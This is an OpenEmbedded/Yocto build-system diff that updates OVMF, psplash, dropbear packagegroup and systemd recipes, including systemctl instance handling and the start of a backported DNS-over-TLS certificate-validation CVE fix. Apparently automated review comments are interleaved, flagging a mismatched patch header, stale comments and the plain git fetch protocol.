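+diff --git a/c/enc/encode.c b/c/enc/encode.c
+index 68548ef..ab0a490 100644
+--- a/BaseTools/Source/C/BrotliCompress/brotli/c/enc/encode.c
++++ c/BaseTools/Source/C/BrotliCompress/brotli/c/enc/encode.c
+@@ -1470,8 +1470,9 @@ static size_t MakeUncompressedStream(
+
+ BROTLI_BOOL BrotliEncoderCompress(
+ int quality, int lgwin, BrotliEncoderMode mode, size_t input_size,
+- const uint8_t* input_buffer, size_t* encoded_size,
+- uint8_t* encoded_buffer) {
++ const uint8_t input_buffer[BROTLI_ARRAY_PARAM(input_size)],
++ size_t* encoded_size,
++ uint8_t encoded_buffer[BROTLI_ARRAY_PARAM(*encoded_size)]) {
+ BrotliEncoderState* s;
+ size_t out_size = *encoded_size;
+ const uint8_t* input_start = input_buffer;
+--
+2.31.1
+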
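Review bot: The second file header of the embedded patch is inconsistent: its `diff --git` line names `a/c/enc/encode.c b/c/enc/encode.c`, its `---` line uses `a/BaseTools/...`, and its `+++` line starts with `c/` instead of `b/`. With a one-component strip the hunk probably still lands on the intended file, but a stricter applier may reject it or resolve a different path. The header should read `diff --git a/BaseTools/Source/C/BrotliCompress/brotli/c/enc/encode.c b/BaseTools/Source/C/BrotliCompress/brotli/c/enc/encode.c` with a matching `+++ b/BaseTools/Source/C/BrotliCompress/brotli/c/enc/encode.c`. The diffstat entries (`c/dec/decode.c`, `c/enc/encode.c`) also still carry the brotli-relative names.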
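--- a/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch
+++ b/meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch
@@ -1,7 +1,7 @@
-From 0a8362cfb9f00870d70687475665b131dd82c947 Mon Sep 17 00:00:00 2001
+From 200ff35c6545b4ab85f5ea7a6096fbaec3d82f6d Mon Sep 17 00:00:00 2001
 From: Ricardo Neri <ricardo.neri-calderon@linux.intel.com>
 Date: Thu, 9 Jun 2016 02:23:01 -0700
-Subject: [PATCH 1/5] ovmf: update path to native BaseTools
+Subject: [PATCH 1/4] ovmf: update path to native BaseTools
 
 BaseTools is a set of utilities to build EDK-based firmware. These utilities
 are used during the build process. Thus, they need to be built natively.
@@ -30,5 +30,5 @@ index 91b1442ade..1858dae31a 100755
  source edksetup.sh BaseTools
  else
 --
-2.17.1
+2.28.0
 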
diff --git a/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch b/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch
index f37ed018ab..c61a08f022 100644
--- a/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch
+++ b/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch
@@ -1,7 +1,7 @@
1From a8bceaec1b16fffbf6810df05503d8ae9092b735 Mon Sep 17 00:00:00 2001 1From 667c0cf97dadc4f5994d26ec3984f559a05ec406 Mon Sep 17 00:00:00 2001
2From: Ricardo Neri <ricardo.neri-calderon@linux.intel.com> 2From: Ricardo Neri <ricardo.neri-calderon@linux.intel.com>
3Date: Fri, 26 Jul 2019 17:34:26 -0400 3Date: Fri, 26 Jul 2019 17:34:26 -0400
4Subject: [PATCH 2/5] BaseTools: makefile: adjust to build in under bitbake 4Subject: [PATCH 2/4] BaseTools: makefile: adjust to build in under bitbake
5 5
6Prepend the build flags with those of bitbake. This is to build 6Prepend the build flags with those of bitbake. This is to build
7using the bitbake native sysroot include and library directories. 7using the bitbake native sysroot include and library directories.
@@ -10,14 +10,14 @@ Signed-off-by: Ricardo Neri <ricardo.neri@linux.intel.com>
10Upstream-Status: Pending 10Upstream-Status: Pending
11 11
12--- 12---
13 BaseTools/Source/C/Makefiles/header.makefile | 10 +++++----- 13 BaseTools/Source/C/Makefiles/header.makefile | 17 +++++++++--------
14 1 file changed, 5 insertions(+), 5 deletions(-) 14 1 file changed, 9 insertions(+), 8 deletions(-)
15 15
16diff --git a/BaseTools/Source/C/Makefiles/header.makefile b/BaseTools/Source/C/Makefiles/header.makefile 16diff --git a/BaseTools/Source/C/Makefiles/header.makefile b/BaseTools/Source/C/Makefiles/header.makefile
17index 4e9b36d98b..eb03ee33fa 100644 17index 1c105ee7d4..d5eea3864e 100644
18--- a/BaseTools/Source/C/Makefiles/header.makefile 18--- a/BaseTools/Source/C/Makefiles/header.makefile
19+++ b/BaseTools/Source/C/Makefiles/header.makefile 19+++ b/BaseTools/Source/C/Makefiles/header.makefile
20@@ -62,23 +62,23 @@ $(error Bad HOST_ARCH) 20@@ -69,35 +69,36 @@ $(error Bad HOST_ARCH)
21 endif 21 endif
22 22
23 INCLUDE = $(TOOL_INCLUDE) -I $(MAKEROOT) -I $(MAKEROOT)/Include/Common -I $(MAKEROOT)/Include/ -I $(MAKEROOT)/Include/IndustryStandard -I $(MAKEROOT)/Common/ -I .. -I . $(ARCH_INCLUDE) 23 INCLUDE = $(TOOL_INCLUDE) -I $(MAKEROOT) -I $(MAKEROOT)/Include/Common -I $(MAKEROOT)/Include/ -I $(MAKEROOT)/Include/IndustryStandard -I $(MAKEROOT)/Common/ -I .. -I . $(ARCH_INCLUDE)
@@ -33,19 +33,35 @@ index 4e9b36d98b..eb03ee33fa 100644
33+BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -Wall -Werror \ 33+BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -Wall -Werror \
34 -Wno-deprecated-declarations -Wno-self-assign -Wno-unused-result -nostdlib -g 34 -Wno-deprecated-declarations -Wno-self-assign -Wno-unused-result -nostdlib -g
35 else 35 else
36 ifeq ($(CXX), llvm)
37-BUILD_CFLAGS = -MD -fshort-wchar -fno-strict-aliasing -fwrapv \
38+BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -fwrapv \
39 -fno-delete-null-pointer-checks -Wall -Werror \
40 -Wno-deprecated-declarations -Wno-self-assign \
41 -Wno-unused-result -nostdlib -g
42 else
36-BUILD_CFLAGS = -MD -fshort-wchar -fno-strict-aliasing -fwrapv \ 43-BUILD_CFLAGS = -MD -fshort-wchar -fno-strict-aliasing -fwrapv \
37+BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -fwrapv \ 44+BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -fwrapv \
38 -fno-delete-null-pointer-checks -Wall -Werror \ 45 -fno-delete-null-pointer-checks -Wall -Werror \
39 -Wno-deprecated-declarations -Wno-stringop-truncation -Wno-restrict \ 46 -Wno-deprecated-declarations -Wno-stringop-truncation -Wno-restrict \
40 -Wno-unused-result -nostdlib -g 47 -Wno-unused-result -nostdlib -g
41 endif 48 endif
49 endif
50 ifeq ($(CXX), llvm)
51-BUILD_LFLAGS =
52-BUILD_CXXFLAGS = -Wno-deprecated-register -Wno-unused-result
53+BUILD_LFLAGS = $(LDFLAGS)
54+BUILD_CXXFLAGS += -Wno-deprecated-register -Wno-unused-result
55 else
42-BUILD_LFLAGS = 56-BUILD_LFLAGS =
43-BUILD_CXXFLAGS = -Wno-unused-result 57-BUILD_CXXFLAGS = -Wno-unused-result
44+BUILD_LFLAGS = $(LDFLAGS) 58+BUILD_LFLAGS = $(LDFLAGS)
45+BUILD_CXXFLAGS += -Wno-unused-result 59+BUILD_CXXFLAGS += -Wno-unused-result
46 60 endif
61+
47 ifeq ($(HOST_ARCH), IA32) 62 ifeq ($(HOST_ARCH), IA32)
48 # 63 #
64 # Snow Leopard is a 32-bit and 64-bit environment. uname -m returns i386, but gcc defaults
49-- 65--
502.17.1 662.28.0
51 67
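--- a/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch
+++ b/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch
@@ -1,7 +1,7 @@
-From 60a5f953f747e1e9e05a40157b651cba8ea57b91 Mon Sep 17 00:00:00 2001
+From e19481e5a64f8915ac118899b10c40d12c0f9daa Mon Sep 17 00:00:00 2001
 From: Dengke Du <dengke.du@windriver.com>
 Date: Mon, 11 Sep 2017 02:21:55 -0400
-Subject: [PATCH 3/5] ovmf: enable long path file
+Subject: [PATCH 3/4] ovmf: enable long path file
 
 Upstream-Status: Pending
 Signed-off-by: Dengke Du <dengke.du@windriver.com>
@@ -24,5 +24,5 @@ index e1cce985f7..d67d03c70c 100644
  #define MAX_UINT64 ((UINT64)0xFFFFFFFFFFFFFFFFULL)
  #define MAX_UINT32 ((UINT32)0xFFFFFFFF)
 --
-2.17.1
+2.28.0
 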
diff --git a/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch b/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch
index c10a39d95d..128438b201 100644
--- a/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch
+++ b/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch
@@ -1,7 +1,7 @@
1From 94eff316b31b4d0348af28c77be5c00bc09fe8e7 Mon Sep 17 00:00:00 2001 1From ad06fcf1e08736e79221cd6863ff2e3c9254f261 Mon Sep 17 00:00:00 2001
2From: Steve Langasek <steve.langasek@ubuntu.com> 2From: Steve Langasek <steve.langasek@ubuntu.com>
3Date: Sat, 10 Jun 2017 01:39:36 -0700 3Date: Sat, 10 Jun 2017 01:39:36 -0700
4Subject: [PATCH 4/5] ovmf: Update to latest 4Subject: [PATCH 4/4] ovmf: Update to latest
5 5
6Description: pass -fno-stack-protector to all GCC toolchains 6Description: pass -fno-stack-protector to all GCC toolchains
7 The upstream build rules inexplicably pass -fno-stack-protector only 7 The upstream build rules inexplicably pass -fno-stack-protector only
@@ -15,15 +15,15 @@ Upstream-Status: Pending
15 1 file changed, 4 insertions(+), 4 deletions(-) 15 1 file changed, 4 insertions(+), 4 deletions(-)
16 16
17diff --git a/BaseTools/Conf/tools_def.template b/BaseTools/Conf/tools_def.template 17diff --git a/BaseTools/Conf/tools_def.template b/BaseTools/Conf/tools_def.template
18index ca0b122dbb..b0066c2ab8 100755 18index 933b3160fd..c2fbbf0c38 100755
19--- a/BaseTools/Conf/tools_def.template 19--- a/BaseTools/Conf/tools_def.template
20+++ b/BaseTools/Conf/tools_def.template 20+++ b/BaseTools/Conf/tools_def.template
21@@ -1941,10 +1941,10 @@ DEFINE GCC_X64_RC_FLAGS = -I binary -O elf64-x86-64 -B i386 21@@ -1952,10 +1952,10 @@ DEFINE GCC_RISCV64_RC_FLAGS = -I binary -O elf64-littleriscv -B riscv
22 DEFINE GCC_ARM_RC_FLAGS = -I binary -O elf32-littlearm -B arm --rename-section .data=.hii 22 # GCC Build Flag for included header file list generation
23 DEFINE GCC_AARCH64_RC_FLAGS = -I binary -O elf64-littleaarch64 -B aarch64 --rename-section .data=.hii 23 DEFINE GCC_DEPS_FLAGS = -MMD -MF $@.deps
24 24
25-DEFINE GCC48_ALL_CC_FLAGS = -g -fshort-wchar -fno-builtin -fno-strict-aliasing -Wall -Werror -Wno-array-bounds -ffunction-sections -fdata-sections -include AutoGen.h -fno-common -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings 25-DEFINE GCC48_ALL_CC_FLAGS = DEF(GCC_ALL_CC_FLAGS) -ffunction-sections -fdata-sections -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings
26+DEFINE GCC48_ALL_CC_FLAGS = -g -fshort-wchar -fno-builtin -fno-strict-aliasing -Wall -Werror -Wno-array-bounds -ffunction-sections -fdata-sections -fno-stack-protector -include AutoGen.h -fno-common -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings 26+DEFINE GCC48_ALL_CC_FLAGS = DEF(GCC_ALL_CC_FLAGS) -ffunction-sections -fdata-sections -fno-stack-protector -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings
27 DEFINE GCC48_IA32_X64_DLINK_COMMON = -nostdlib -Wl,-n,-q,--gc-sections -z common-page-size=0x20 27 DEFINE GCC48_IA32_X64_DLINK_COMMON = -nostdlib -Wl,-n,-q,--gc-sections -z common-page-size=0x20
28-DEFINE GCC48_IA32_CC_FLAGS = DEF(GCC48_ALL_CC_FLAGS) -m32 -march=i586 -malign-double -fno-stack-protector -D EFI32 -fno-asynchronous-unwind-tables -Wno-address 28-DEFINE GCC48_IA32_CC_FLAGS = DEF(GCC48_ALL_CC_FLAGS) -m32 -march=i586 -malign-double -fno-stack-protector -D EFI32 -fno-asynchronous-unwind-tables -Wno-address
29-DEFINE GCC48_X64_CC_FLAGS = DEF(GCC48_ALL_CC_FLAGS) -m64 -fno-stack-protector "-DEFIAPI=__attribute__((ms_abi))" -maccumulate-outgoing-args -mno-red-zone -Wno-address -mcmodel=small -fpie -fno-asynchronous-unwind-tables -Wno-address 29-DEFINE GCC48_X64_CC_FLAGS = DEF(GCC48_ALL_CC_FLAGS) -m64 -fno-stack-protector "-DEFIAPI=__attribute__((ms_abi))" -maccumulate-outgoing-args -mno-red-zone -Wno-address -mcmodel=small -fpie -fno-asynchronous-unwind-tables -Wno-address
@@ -32,7 +32,7 @@ index ca0b122dbb..b0066c2ab8 100755
32 DEFINE GCC48_IA32_X64_ASLDLINK_FLAGS = DEF(GCC48_IA32_X64_DLINK_COMMON) -Wl,--entry,ReferenceAcpiTable -u ReferenceAcpiTable 32 DEFINE GCC48_IA32_X64_ASLDLINK_FLAGS = DEF(GCC48_IA32_X64_DLINK_COMMON) -Wl,--entry,ReferenceAcpiTable -u ReferenceAcpiTable
33 DEFINE GCC48_IA32_X64_DLINK_FLAGS = DEF(GCC48_IA32_X64_DLINK_COMMON) -Wl,--entry,$(IMAGE_ENTRY_POINT) -u $(IMAGE_ENTRY_POINT) -Wl,-Map,$(DEST_DIR_DEBUG)/$(BASE_NAME).map,--whole-archive 33 DEFINE GCC48_IA32_X64_DLINK_FLAGS = DEF(GCC48_IA32_X64_DLINK_COMMON) -Wl,--entry,$(IMAGE_ENTRY_POINT) -u $(IMAGE_ENTRY_POINT) -Wl,-Map,$(DEST_DIR_DEBUG)/$(BASE_NAME).map,--whole-archive
34 DEFINE GCC48_IA32_DLINK2_FLAGS = -Wl,--defsym=PECOFF_HEADER_SIZE=0x220 DEF(GCC_DLINK2_FLAGS_COMMON) 34 DEFINE GCC48_IA32_DLINK2_FLAGS = -Wl,--defsym=PECOFF_HEADER_SIZE=0x220 DEF(GCC_DLINK2_FLAGS_COMMON)
35@@ -1953,7 +1953,7 @@ DEFINE GCC48_X64_DLINK2_FLAGS = -Wl,--defsym=PECOFF_HEADER_SIZE=0x228 DEF 35@@ -1964,7 +1964,7 @@ DEFINE GCC48_X64_DLINK2_FLAGS = -Wl,--defsym=PECOFF_HEADER_SIZE=0x228 DEF
36 DEFINE GCC48_ASM_FLAGS = DEF(GCC_ASM_FLAGS) 36 DEFINE GCC48_ASM_FLAGS = DEF(GCC_ASM_FLAGS)
37 DEFINE GCC48_ARM_ASM_FLAGS = $(ARCHASM_FLAGS) $(PLATFORM_FLAGS) DEF(GCC_ASM_FLAGS) -mlittle-endian 37 DEFINE GCC48_ARM_ASM_FLAGS = $(ARCHASM_FLAGS) $(PLATFORM_FLAGS) DEF(GCC_ASM_FLAGS) -mlittle-endian
38 DEFINE GCC48_AARCH64_ASM_FLAGS = $(ARCHASM_FLAGS) $(PLATFORM_FLAGS) DEF(GCC_ASM_FLAGS) -mlittle-endian 38 DEFINE GCC48_AARCH64_ASM_FLAGS = $(ARCHASM_FLAGS) $(PLATFORM_FLAGS) DEF(GCC_ASM_FLAGS) -mlittle-endian
@@ -42,5 +42,5 @@ index ca0b122dbb..b0066c2ab8 100755
42 DEFINE GCC48_AARCH64_CC_FLAGS = $(ARCHCC_FLAGS) $(PLATFORM_FLAGS) -mcmodel=large DEF(GCC_AARCH64_CC_FLAGS) 42 DEFINE GCC48_AARCH64_CC_FLAGS = $(ARCHCC_FLAGS) $(PLATFORM_FLAGS) -mcmodel=large DEF(GCC_AARCH64_CC_FLAGS)
43 DEFINE GCC48_AARCH64_CC_XIPFLAGS = DEF(GCC_AARCH64_CC_XIPFLAGS) 43 DEFINE GCC48_AARCH64_CC_XIPFLAGS = DEF(GCC_AARCH64_CC_XIPFLAGS)
44-- 44--
452.17.1 452.28.0
46 46
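--- a/meta/recipes-core/ovmf/ovmf_git.bb
+++ b/meta/recipes-core/ovmf/ovmf_git.bb
@@ -12,15 +12,19 @@ LIC_FILES_CHKSUM = "file://OvmfPkg/License.txt;md5=06357ddc23f46577c2aeaeaf7b776
 PACKAGECONFIG ??= ""
 PACKAGECONFIG[secureboot] = ",,,"
 
-SRC_URI = "gitsm://github.com/tianocore/edk2.git;branch=master;protocol=git \
+SRC_URI = "gitsm://github.com/tianocore/edk2.git;branch=master;protocol=https \
  file://0001-ovmf-update-path-to-native-BaseTools.patch \
  file://0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch \
  file://0003-ovmf-enable-long-path-file.patch \
  file://0004-ovmf-Update-to-latest.patch \
- "
-
-PV = "edk2-stable201911"
-SRCREV = "bd85bf54c268204c7a698a96f3ccd96cd77952cd"
+ file://0001-Fix-VLA-parameter-warning.patch \
+ file://0001-Basetools-genffs-fix-gcc12-warning.patch \
+ file://0001-Basetools-lzmaenc-fix-gcc12-warning.patch \
+ file://0001-Basetools-turn-off-gcc12-warning.patch \
+ "
+
+PV = "edk2-stable202008"
+SRCREV = "06dc822d045c2bb42e497487935485302486e151"
 UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>edk2-stable.*)"
 
 inherit deploy
@@ -37,7 +41,7 @@ EDK_TOOLS_DIR="edk2_basetools"
 BUILD_OPTIMIZATION="-pipe"
 
 # OVMF supports IA only, although it could conceivably support ARM someday.
-COMPATIBLE_HOST='(i.86|x86_64).*'
+COMPATIBLE_HOST_class-target='(i.86|x86_64).*'
 
 # Additional build flags for OVMF with Secure Boot.
 # Fedora also uses "-D SMM_REQUIRE -D EXCLUDE_SHELL_FROM_FD".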
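Review bot: The comment kept above the changed line, `# OVMF supports IA only, ...`, no longer matches what `COMPATIBLE_HOST_class-target='(i.86|x86_64).*'` does, because the restriction now applies to target builds only and leaves other variants of the recipe unrestricted. Presumably this lets a native variant build on non-x86 hosts, but the hunk does not say so. The comment could become `# OVMF firmware is built for IA targets only; the class-target override leaves non-target variants of this recipe unrestricted.`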
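--- a/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb
+++ b/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb
@@ -4,3 +4,4 @@ PR = "r1"
 inherit packagegroup
 
 RDEPENDS_${PN} = "dropbear"
+RRECOMMENDS_${PN} = "openssh-sftp-server"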
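Review bot: The new `RRECOMMENDS_${PN} = "openssh-sftp-server"` installs an SFTP server binary into every image that uses this packagegroup, and nothing in the recipe says why or how to leave it out. Images that only want a dropbear shell now ship an additional file-transfer component by default. A comment above the line would cover both, for example `# sftp/scp clients need an sftp server on the target; exclude it with BAD_RECOMMENDATIONS if file transfer is not wanted`.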
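--- a/meta/recipes-core/psplash/files/psplash-start.service
+++ b/meta/recipes-core/psplash/files/psplash-start.service
@@ -2,6 +2,7 @@
 Description=Start psplash boot splash screen
 DefaultDependencies=no
 RequiresMountsFor=/run
+ConditionFileIsExecutable=/usr/bin/psplash
 
 [Service]
 Type=notify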
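--- a/meta/recipes-core/psplash/files/psplash-systemd.service
+++ b/meta/recipes-core/psplash/files/psplash-systemd.service
@@ -4,6 +4,7 @@ DefaultDependencies=no
 After=psplash-start.service
 Requires=psplash-start.service
 RequiresMountsFor=/run
+ConditionFileIsExecutable=/usr/bin/psplash
 
 [Service]
 ExecStart=/usr/bin/psplash-systemd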
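--- a/meta/recipes-core/psplash/psplash_git.bb
+++ b/meta/recipes-core/psplash/psplash_git.bb
@@ -10,7 +10,7 @@ SRCREV = "0a902f7cd875ccf018456451be369f05fa55f962"
 PV = "0.1+git${SRCPV}"
 PR = "r15"
 
-SRC_URI = "git://git.yoctoproject.org/${BPN} \
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \
  file://psplash-init \
  file://psplash-start.service \
  file://psplash-systemd.service \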
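Review bot: The updated `SRC_URI` adds `branch=master` but keeps the fetcher's default transport, while the ovmf and systemd recipes in this same commit switch to `protocol=https`. The pinned `SRCREV` limits what a tampered transfer could deliver, but the plain git protocol gives no server authentication and is often blocked on build networks. If the host serves this repository over HTTPS, the line could read `SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master;protocol=https \`.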
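--- a/meta/recipes-core/systemd/systemd-conf/wired.network
+++ b/meta/recipes-core/systemd/systemd-conf/wired.network
@@ -1,6 +1,7 @@
 [Match]
 Name=en* eth*
 KernelCommandLine=!nfsroot
+KernelCommandLine=!ip
 
 [Network]
 DHCP=yes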
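--- a/meta/recipes-core/systemd/systemd-conf_244.3.bb
+++ b/meta/recipes-core/systemd/systemd-conf_244.3.bb
@@ -23,9 +23,6 @@ do_install() {
 # Based on change from YP bug 8141, OE commit 5196d7bacaef1076c361adaa2867be31759c1b52
 do_install_append_qemuall() {
  install -D -m0644 ${WORKDIR}/system.conf-qemuall ${D}${systemd_unitdir}/system.conf.d/01-${PN}.conf
-
- # Do not install wired.network for qemu bsps
- rm -rf ${D}${systemd_unitdir}/network
 }
 
 PACKAGE_ARCH = "${MACHINE_ARCH}"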
diff --git a/meta/recipes-core/systemd/systemd-systemctl/systemctl b/meta/recipes-core/systemd/systemd-systemctl/systemctl
index 990de1ab39..e003c860e3 100755
--- a/meta/recipes-core/systemd/systemd-systemctl/systemctl
+++ b/meta/recipes-core/systemd/systemd-systemctl/systemctl
@@ -11,6 +11,7 @@ import re
11import sys 11import sys
12 12
13from collections import namedtuple 13from collections import namedtuple
14from itertools import chain
14from pathlib import Path 15from pathlib import Path
15 16
16version = 1.0 17version = 1.0
@@ -25,12 +26,16 @@ locations = list()
25 26
26class SystemdFile(): 27class SystemdFile():
27 """Class representing a single systemd configuration file""" 28 """Class representing a single systemd configuration file"""
28 def __init__(self, root, path): 29 def __init__(self, root, path, instance_unit_name):
29 self.sections = dict() 30 self.sections = dict()
30 self._parse(root, path) 31 self._parse(root, path)
31 dirname = os.path.basename(path.name) + ".d" 32 dirname = os.path.basename(path.name) + ".d"
32 for location in locations: 33 for location in locations:
33 for path2 in sorted((root / location / "system" / dirname).glob("*.conf")): 34 files = (root / location / "system" / dirname).glob("*.conf")
35 if instance_unit_name:
36 inst_dirname = instance_unit_name + ".d"
37 files = chain(files, (root / location / "system" / inst_dirname).glob("*.conf"))
38 for path2 in sorted(files):
34 self._parse(root, path2) 39 self._parse(root, path2)
35 40
36 def _parse(self, root, path): 41 def _parse(self, root, path):
@@ -177,12 +182,14 @@ class SystemdUnit():
177 182
178 raise SystemdUnitNotFoundError(self.root, unit) 183 raise SystemdUnitNotFoundError(self.root, unit)
179 184
180 def _process_deps(self, config, service, location, prop, dirstem): 185 def _process_deps(self, config, service, location, prop, dirstem, instance):
181 systemdir = self.root / SYSCONFDIR / "systemd" / "system" 186 systemdir = self.root / SYSCONFDIR / "systemd" / "system"
182 187
183 target = ROOT / location.relative_to(self.root) 188 target = ROOT / location.relative_to(self.root)
184 try: 189 try:
185 for dependent in config.get('Install', prop): 190 for dependent in config.get('Install', prop):
191 # expand any %i to instance (ignoring escape sequence %%)
192 dependent = re.sub("([^%](%%)*)%i", "\\g<1>{}".format(instance), dependent)
186 wants = systemdir / "{}.{}".format(dependent, dirstem) / service 193 wants = systemdir / "{}.{}".format(dependent, dirstem) / service
187 add_link(wants, target) 194 add_link(wants, target)
188 195
@@ -193,8 +200,11 @@ class SystemdUnit():
193 # if we're enabling an instance, first extract the actual instance 200 # if we're enabling an instance, first extract the actual instance
194 # then figure out what the template unit is 201 # then figure out what the template unit is
195 template = re.match(r"[^@]+@(?P<instance>[^\.]*)\.", self.unit) 202 template = re.match(r"[^@]+@(?P<instance>[^\.]*)\.", self.unit)
203 instance_unit_name = None
196 if template: 204 if template:
197 instance = template.group('instance') 205 instance = template.group('instance')
206 if instance != "":
207 instance_unit_name = self.unit
198 unit = re.sub(r"@[^\.]*\.", "@.", self.unit, 1) 208 unit = re.sub(r"@[^\.]*\.", "@.", self.unit, 1)
199 else: 209 else:
200 instance = None 210 instance = None
@@ -206,7 +216,7 @@ class SystemdUnit():
206 # ignore aliases 216 # ignore aliases
207 return 217 return
208 218
209 config = SystemdFile(self.root, path) 219 config = SystemdFile(self.root, path, instance_unit_name)
210 if instance == "": 220 if instance == "":
211 try: 221 try:
212 default_instance = config.get('Install', 'DefaultInstance')[0] 222 default_instance = config.get('Install', 'DefaultInstance')[0]
@@ -219,8 +229,8 @@ class SystemdUnit():
219 else: 229 else:
220 service = self.unit 230 service = self.unit
221 231
222 self._process_deps(config, service, path, 'WantedBy', 'wants') 232 self._process_deps(config, service, path, 'WantedBy', 'wants', instance)
223 self._process_deps(config, service, path, 'RequiredBy', 'requires') 233 self._process_deps(config, service, path, 'RequiredBy', 'requires', instance)
224 234
225 try: 235 try:
226 for also in config.get('Install', 'Also'): 236 for also in config.get('Install', 'Also'):
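diff --git a/meta/recipes-core/systemd/systemd.inc b/meta/recipes-core/systemd/systemd.inc
index 3165d13f03..8b5260bb0d 100644
--- a/meta/recipes-core/systemd/systemd.inc
+++ b/meta/recipes-core/systemd/systemd.inc
@@ -16,6 +16,6 @@ LIC_FILES_CHKSUM = "file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe \
 
 SRCREV = "3ceaa81c61b654ebf562464d142675bd4d57d7b6"
 SRCBRANCH = "v244-stable"
-SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=git;branch=${SRCBRANCH}"
+SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=https;branch=${SRCBRANCH}"
 
 S = "${WORKDIR}/git"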
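diff --git a/meta/recipes-core/systemd/systemd/00-create-volatile.conf b/meta/recipes-core/systemd/systemd/00-create-volatile.conf
index 87cbe1e7d3..c4277221a2 100644
--- a/meta/recipes-core/systemd/systemd/00-create-volatile.conf
+++ b/meta/recipes-core/systemd/systemd/00-create-volatile.conf
@@ -3,5 +3,6 @@
 # inside /var/log.
 
 
+d /run/lock 1777 - - -
 d /var/volatile/log - - - -
 d /var/volatile/tmp 1777 - -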
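Review bot: The added `d /run/lock 1777 - - -` entry creates a world-writable (sticky) lock directory, and the visible end of the file's header comment only talks about /var/log, so the reason for the new line and its mode is not recorded anywhere in the file. A one-line comment above it, for example `# /run/lock is 1777 so that unprivileged programs can create their lock files`, would document the intent. If only privileged services are expected to lock there, a tighter mode would stop any local user from pre-creating lock names that those services rely on; that depends on consumers not visible in this hunk.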
diff --git a/meta/recipes-core/systemd/systemd/CVE-2018-21029.patch b/meta/recipes-core/systemd/systemd/CVE-2018-21029.patch
new file mode 100644
index 0000000000..8d3801a248
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2018-21029.patch
@@ -0,0 +1,120 @@
1From 3f9d9289ee8730a81a0464539f4e1ba2d23d0ce9 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
3Date: Tue, 3 Mar 2020 23:31:25 +0000
4Subject: [PATCH] systemd-resolved: use hostname for certificate validation in
5 DoT
6
7Widely accepted certificates for IP addresses are expensive and only
8affordable for larger organizations. Therefore if the user provides
9the hostname in the DNS= option, we should use it instead of the IP
10address.
11
12(cherry picked from commit eec394f10bbfcc3d2fc8504ad8ff5be44231abd5)
13
14CVE: CVE-2018-21029
15Upstream-Status: Backport [ff26d281aec0877b43269f18c6282cd79a7f5529]
16Signed-off-by: Marek Vasut <marex@denx.de>
17---
18 man/resolved.conf.xml | 16 +++++++++++-----
19 src/resolve/resolved-dnstls-gnutls.c | 20 ++++++++++++--------
20 src/resolve/resolved-dnstls-openssl.c | 15 +++++++++++----
21 3 files changed, 34 insertions(+), 17 deletions(-)
22
23diff --git a/man/resolved.conf.xml b/man/resolved.conf.xml
24index 818000145b..37161ebcbc 100644
25--- a/man/resolved.conf.xml
26+++ b/man/resolved.conf.xml
27@@ -193,11 +193,17 @@
28 <varlistentry>
29 <term><varname>DNSOverTLS=</varname></term>
30 <listitem>
31- <para>Takes a boolean argument or <literal>opportunistic</literal>.
32- If true all connections to the server will be encrypted. Note that
33- this mode requires a DNS server that supports DNS-over-TLS and has
34- a valid certificate for it's IP. If the DNS server does not support
35- DNS-over-TLS all DNS requests will fail. When set to <literal>opportunistic</literal>
36+ <para>Takes a boolean argument or <literal>opportunistic</literal>. If
37+ true all connections to the server will be encrypted. Note that this
38+ mode requires a DNS server that supports DNS-over-TLS and has a valid
39+ certificate. If the hostname was specified in <varname>DNS=</varname>
40+ by using the format format <literal>address#server_name</literal> it
41+ is used to validate its certificate and also to enable Server Name
42+ Indication (SNI) when opening a TLS connection. Otherwise
43+ the certificate is checked against the server's IP.
44+ If the DNS server does not support DNS-over-TLS all DNS requests will fail.</para>
45+
46+ <para>When set to <literal>opportunistic</literal>
47 DNS request are attempted to send encrypted with DNS-over-TLS.
48 If the DNS server does not support TLS, DNS-over-TLS is disabled.
49 Note that this mode makes DNS-over-TLS vulnerable to "downgrade"
50diff --git a/src/resolve/resolved-dnstls-gnutls.c b/src/resolve/resolved-dnstls-gnutls.c
51index ed0a31e8bf..c7215723a7 100644
52--- a/src/resolve/resolved-dnstls-gnutls.c
53+++ b/src/resolve/resolved-dnstls-gnutls.c
54@@ -56,15 +56,19 @@ int dnstls_stream_connect_tls(DnsStream *stream, DnsServer *server) {
55 }
56
57 if (server->manager->dns_over_tls_mode == DNS_OVER_TLS_YES) {
58- stream->dnstls_data.validation.type = GNUTLS_DT_IP_ADDRESS;
59- if (server->family == AF_INET) {
